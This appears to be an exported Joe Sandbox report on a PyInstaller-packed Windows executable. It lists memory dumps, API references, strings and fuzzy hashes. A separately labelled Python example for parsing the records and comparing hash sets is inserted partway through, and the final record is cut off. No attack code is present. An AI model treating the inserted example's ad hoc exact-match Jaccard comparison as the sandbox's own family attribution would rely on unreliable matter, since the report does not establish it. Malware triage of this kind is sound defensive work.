• Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
APIs
• HeapAlloc.KERNEL32(?,?,?,00007FF7A673FE44,?,?,?,00007FF7A6741356,?,?,?,?,?,00007FF7A6742949), ref: 00007FF7A674CB0A
Memory Dump Source
• Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
• Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
• Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$LOADER: Failed to load tcl/tk libraries$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
• API String ID: 2238633743-1453502826
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
• Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
Similarity
• API ID: MessageSend$Window$Create$Move$ObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
• String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
• API String ID: 2446303242-1601438679
Memory Dump Source
• Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
Similarity
• API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
• String ID: 1#IND$1#INF$1#QNAN$1#SNAN
• API String ID: 808467561-2761157908
APIs
• GetLastError.KERNEL32(00000000,00007FF7A67326A0), ref: 00007FF7A67374D7
• FormatMessageW.KERNEL32(00000000,00007FF7A67326A0), ref: 00007FF7A6737506
• WideCharToMultiByte.KERNEL32 ref: 00007FF7A673755C
  • Part of subcall function 00007FF7A6732620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7A6737744,?,?,?,?,?,?,?,?,?,?,?,00007FF7A673101D), ref: 00007FF7A6732654
  • Part of subcall function 00007FF7A6732620: MessageBoxW.USER32 ref: 00007FF7A673272C
Similarity
• API ID: ErrorLastMessage$ByteCharFormatMultiWide
• String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
• API String ID: 2920928814-2573406579
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
Similarity
• API ID: FileFindFirst_invalid_parameter_noinfo
• String ID:
• API String ID: 2227656907-0
Similarity
• API ID: memcpy_s
• String ID:
• API String ID: 1502251526-0
Similarity
• API ID: ExceptionRaise_clrfp
• String ID:
• API String ID: 15204871-0
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
Similarity
• API ID:
• String ID: $
• API String ID: 0-227171996
Strings
Similarity
• API ID:
• String ID: e+000$gfff
• API String ID: 0-3030954782
Similarity
• API ID: CurrentFeaturePresentProcessProcessor
• String ID:
• API String ID: 1010374628-0
Strings
Similarity
• API ID:
• String ID: gfffffff
• API String ID: 0-1523873471
Strings
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: TMP
• API String ID: 3215553584-3125297090
APIs
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
                                                                                                                        Similarity
                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3215553584-0
                                                                                                                        • Opcode ID: 093da9d804f6d3f0dcf011766d3ac1044083a14a82be884a6ec622c588f21297
                                                                                                                        • Instruction ID: 595d04aeb34519e772e92aeb86e17ee724ada48766c0692b28125992fc7b9f26
                                                                                                                        • Opcode Fuzzy Hash: 093da9d804f6d3f0dcf011766d3ac1044083a14a82be884a6ec622c588f21297
                                                                                                                        • Instruction Fuzzy Hash: 7E611C62E3E15245F725A528886433FE691BF48F70F970279D71E466F9DE3EE8008720
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d861661aa08db629cc23cdca8c369b076586a2e450c00db1ba5d57a294e44a4f
                                                                                                                        • Instruction ID: be47699376d752ca80ef9ceda4346b4dda0c58dab98e4eb828143a8188aee79e
                                                                                                                        • Opcode Fuzzy Hash: d861661aa08db629cc23cdca8c369b076586a2e450c00db1ba5d57a294e44a4f
                                                                                                                        • Instruction Fuzzy Hash: 9751C836A7965182E724AB29C85C23A77A0EB5CF98F664131CE4D077B4CB3AEC53C750
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c32b4ddfd43473a216dec7aa9a0be5b617892f75f4149cffacdc7470c95e978f
                                                                                                                        • Instruction ID: 3e969d7e5e82252626fabe3ad78cf2d12253717a627a0da5b697c76f05d1bcbb
                                                                                                                        • Opcode Fuzzy Hash: c32b4ddfd43473a216dec7aa9a0be5b617892f75f4149cffacdc7470c95e978f
                                                                                                                        • Instruction Fuzzy Hash: 7251B536A29651C6E7249F28C46C27A73A0EB4CF58F654235CE5D077B5CB3AE843C760
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 867914ff4df0b6b44d704adc42bbe88cde9096fdc707783f05752eff833c7ffe
                                                                                                                        • Instruction ID: 1d00337b265161faab2704c835656fa7297e6e3d1d31cb213591e076eae17186
                                                                                                                        • Opcode Fuzzy Hash: 867914ff4df0b6b44d704adc42bbe88cde9096fdc707783f05752eff833c7ffe
                                                                                                                        • Instruction Fuzzy Hash: 35519836A6565182E764AB2DD46C27AB3A0EB4CF9CF664131CE4D077B4CB3AE843C750
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1de1d42fcd570761cca71ddda72003ed022ec41b6526507f8e47f89f031e3167
                                                                                                                        • Instruction ID: e9ad7509a4ad231e972daaded52083d1a04b604aa9603deaf50086df25b72692
                                                                                                                        • Opcode Fuzzy Hash: 1de1d42fcd570761cca71ddda72003ed022ec41b6526507f8e47f89f031e3167
                                                                                                                        • Instruction Fuzzy Hash: 5551D93663666185E724AB28C46C23AB3A0EB4CF58F654135CE5C177B5CF3AE853CB50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 876697f8e8f5cbbdb44752562e3cb115d809b93d1bac5633a342ac63b65505f1
                                                                                                                        • Instruction ID: 83dfeef1cfdb50e5ba58a02977c4bcd87b57922448705376945305e4b0d95b3f
                                                                                                                        • Opcode Fuzzy Hash: 876697f8e8f5cbbdb44752562e3cb115d809b93d1bac5633a342ac63b65505f1
                                                                                                                        • Instruction Fuzzy Hash: 5A51B436B2965186E7249B28C86C23EA7A0EB48F58F664131CE5C177B4DF3AEC42C750
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6b4a4146db3bd1fe649265067838c8b0d7c1a5e97031d62dd0eb31e0fdd0228e
                                                                                                                        • Instruction ID: a73eb6179382dd8be0745e8821c152be934585d211c8be03371624bd275d1c21
                                                                                                                        • Opcode Fuzzy Hash: 6b4a4146db3bd1fe649265067838c8b0d7c1a5e97031d62dd0eb31e0fdd0228e
                                                                                                                        • Instruction Fuzzy Hash: CC51C832B6565186E764AB29C46C33D67A0EB49F58FA54131CE4C877B8CF3AE843C750
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                        • Instruction ID: 5058f14e9d89683dce613ae6d0fc43c046858892134bb5aaba835116f9897822
                                                                                                                        • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                        • Instruction Fuzzy Hash: 3D414A46C3F65E44FA5099284C3C6B69680EF26FA4DEA52B0CE9B133F7CD0C6586C260
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFreeHeapLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 485612231-0
                                                                                                                        • Opcode ID: d52a693ca64156346f3ce50e8e1564a69fccf06189b002bdd4e7495fde204544
                                                                                                                        • Instruction ID: 10763bfa125849dc860613bcbb1649cf6331db0ee2cecedc50f5e6df619263f5
                                                                                                                        • Opcode Fuzzy Hash: d52a693ca64156346f3ce50e8e1564a69fccf06189b002bdd4e7495fde204544
                                                                                                                        • Instruction Fuzzy Hash: 69411972736A5482EF44DF6ADD6856AB3A1B74CFD0B8A9132DE0D87B64DE3CC4428300
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ee4673de95ce1c3203f19ce9ce644468e75f80e7845f38315ddde02822e300f2
                                                                                                                        • Instruction ID: 8c990dc1153174d5cd9d7ad1ebc72a1d2d2bb2f330f7f7eeb09d8c6503122090
                                                                                                                        • Opcode Fuzzy Hash: ee4673de95ce1c3203f19ce9ce644468e75f80e7845f38315ddde02822e300f2
                                                                                                                        • Instruction Fuzzy Hash: E831B33272AB4282E624EF25685953BE694ABC8F90F554238EA4D53BF6DF3CD0128614
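The records above are the raw per-function similarity data the Joe Sandbox IDA plugin exports: opcode and instruction fuzzy hashes, keyed by the API an item references and by the memory dump it was carved from. The following is an added example, not part of this report and not Joe Sandbox's own tooling. It parses this text layout into structured records, validates the hash fields, indexes records by API ID, and compares two samples' instruction-fuzzy-hash sets with Jaccard similarity so that a second dump of the same family can be triaged quickly. The embedded input is two records copied from the listing (the HTML export's indentation and "Download File" link text dropped); the second hash set used in the comparison is constructed, and Jaccard over exact hash matches is this example's own choice of metric, not the plugin's similarity algorithm.

```python
"""Parse Joe Sandbox 'IDA Plugin / Similarity' records and compare hash sets."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

# Constructed sample: two records in the layout of the listing above. The values
# are copied from the report; the layout is trimmed, so this is not raw sandbox output.
SAMPLE_LISTING = """\
Memory Dump Source
• Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
• Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 093da9d804f6d3f0dcf011766d3ac1044083a14a82be884a6ec622c588f21297
• Instruction ID: 595d04aeb34519e772e92aeb86e17ee724ada48766c0692b28125992fc7b9f26
• Opcode Fuzzy Hash: 093da9d804f6d3f0dcf011766d3ac1044083a14a82be884a6ec622c588f21297
• Instruction Fuzzy Hash: 7E611C62E3E15245F725A528886433FE691BF48F70F970279D71E466F9DE3EE8008720
Memory Dump Source
• Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
• Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
Similarity
• API ID: ErrorFreeHeapLast
• String ID:
• API String ID: 485612231-0
• Opcode ID: d52a693ca64156346f3ce50e8e1564a69fccf06189b002bdd4e7495fde204544
• Instruction ID: 10763bfa125849dc860613bcbb1649cf6331db0ee2cecedc50f5e6df619263f5
• Opcode Fuzzy Hash: d52a693ca64156346f3ce50e8e1564a69fccf06189b002bdd4e7495fde204544
• Instruction Fuzzy Hash: 69411972736A5482EF44DF6ADD6856AB3A1B74CFD0B8A9132DE0D87B64DE3CC4428300
"""

# 'Source File' value: '<dump>.sdmp, Offset: <hex base>, based on PE: true|false'
SOURCE_RE = re.compile(
    r"^(?P<file>\S+\.sdmp), Offset: (?P<offset>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)$"
)
HEX_RE = re.compile(r"^[0-9A-Fa-f]+$")
HASH_FIELDS = ("Opcode ID", "Instruction ID", "Opcode Fuzzy Hash", "Instruction Fuzzy Hash")


@dataclass
class SimilarityRecord:
    source_file: str = ""
    image_base: int = 0            # the 'Offset' of the source dump, parsed as hex
    based_on_pe: bool = False
    associated: List[str] = field(default_factory=list)
    snapshot_file: str = ""
    fields: Dict[str, str] = field(default_factory=dict)   # API ID, Opcode ID, ...


def parse_similarity_records(text: str) -> List[SimilarityRecord]:
    """Split the listing at each 'Memory Dump Source' header and collect its bullet fields."""
    records: List[SimilarityRecord] = []
    current: Optional[SimilarityRecord] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            current = SimilarityRecord()
            records.append(current)
            continue
        if current is None or not line.startswith("•"):
            continue                      # blank lines and section labels such as 'Similarity'
        key, _, value = line[1:].partition(":")
        key, value = key.strip(), value.strip()
        if key == "Source File":
            m = SOURCE_RE.match(value)
            if not m:
                raise ValueError(f"unrecognised Source File line: {value!r}")
            current.source_file = m["file"]
            current.image_base = int(m["offset"], 16)
            current.based_on_pe = m["pe"] == "true"
        elif key == "Associated":
            current.associated.append(value)
        elif key == "Snapshot File":
            current.snapshot_file = value
        else:
            current.fields[key] = value    # empty values (e.g. 'String ID:') are kept as ""
    return records


def check_record(rec: SimilarityRecord) -> List[str]:
    """Return the problems that would make a record unsafe to use for matching."""
    problems = [f"{n} missing or not hex" for n in HASH_FIELDS
                if not HEX_RE.match(rec.fields.get(n, ""))]
    # Every record in this report carries identical Opcode ID and Opcode Fuzzy Hash
    # values; a divergence is worth a look before relying on either for matching.
    if rec.fields.get("Opcode ID") != rec.fields.get("Opcode Fuzzy Hash"):
        problems.append("Opcode ID differs from Opcode Fuzzy Hash")
    if not rec.based_on_pe:
        problems.append("dump not based on a PE image")
    return problems


def index_by_api(records: List[SimilarityRecord]) -> Dict[str, List[SimilarityRecord]]:
    out: Dict[str, List[SimilarityRecord]] = {}
    for rec in records:
        out.setdefault(rec.fields.get("API ID", ""), []).append(rec)
    return out


def instruction_hashes(records: List[SimilarityRecord]) -> Set[str]:
    return {r.fields["Instruction Fuzzy Hash"] for r in records if "Instruction Fuzzy Hash" in r.fields}


def jaccard(a: Set[str], b: Set[str]) -> float:
    """Exact-match overlap of two hash sets (assumption: this metric is the example's own)."""
    if not a and not b:
        return 1.0
    return len(a & b) / len(a | b)


if __name__ == "__main__":
    recs = parse_similarity_records(SAMPLE_LISTING)
    for r in recs:
        print(r.fields.get("API ID") or "<no API>", hex(r.image_base), check_record(r))
    # Hypothetical second sample (constructed): shares one function with this one.
    other = {recs[0].fields["Instruction Fuzzy Hash"], "00" * 35}
    print("overlap with constructed second sample:", jaccard(instruction_hashes(recs), other))
```

Run it against the full listing by feeding the text of this section (with its indentation) to `parse_similarity_records`; the parser strips leading whitespace, so the report's layout needs no preprocessing beyond removing the link text.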
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b98f8205f4dd5ad0f3b4c63852b6076f32f3a1b530b1ff8e23dc59df104b107b
                                                                                                                        • Instruction ID: 8cd4b6d1a3331b190d9d4e7312f86d35509cfc119dac6b5f6060c3f66d92c247
                                                                                                                        • Opcode Fuzzy Hash: b98f8205f4dd5ad0f3b4c63852b6076f32f3a1b530b1ff8e23dc59df104b107b
